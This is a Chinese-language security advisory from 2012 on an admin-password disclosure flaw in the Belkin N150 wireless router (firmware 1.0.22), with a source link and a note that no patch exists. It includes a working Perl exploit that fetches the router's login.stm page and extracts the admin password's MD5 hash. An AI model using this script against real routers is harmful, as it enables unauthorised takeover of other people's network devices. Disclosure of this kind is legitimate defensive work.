安全研究
安全漏洞
Belkin N150 Wireless Router 'login.stm'管理员密码泄露漏洞
发布日期:2012-05-14
更新日期:2012-05-15
受影响系统:Belkin N150 Wireless Router 1.0.22
描述:
BUGTRAQ ID:
53502
Belkin N150是贝尔金的一款无线路由器。
Belkin N150无线路由器1.00.22版本在实现上存在密码泄露漏洞,攻击者可利用此漏洞获取管理员密码。
<*来源:Avinash Tangirala
链接:
http://secunia.com/advisories/49145/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
=========
Exploit :
=========
#/usr/bin/perl
use strict;
use LWP::Simple;
print "\n 'Belkin N150 Wireless Router' Admin Exploit ";
print "\n ---------------------------------------------\n\n";
print "[+] Enter the Router's IP Address : ";
my $ip=<STDIN>;
chomp($ip);
$ip=get("http://".$ip."/login.stm") or die "\n[!] check ip and try again \n";
my @arr=$ip =~ m/var password = "(.*)";/g;
print "[+] Admin Password = ".@arr[0]." (MD5 Hash).\n";
建议:
厂商补丁:
Belkin
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.belkin.com/浏览次数:2618
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
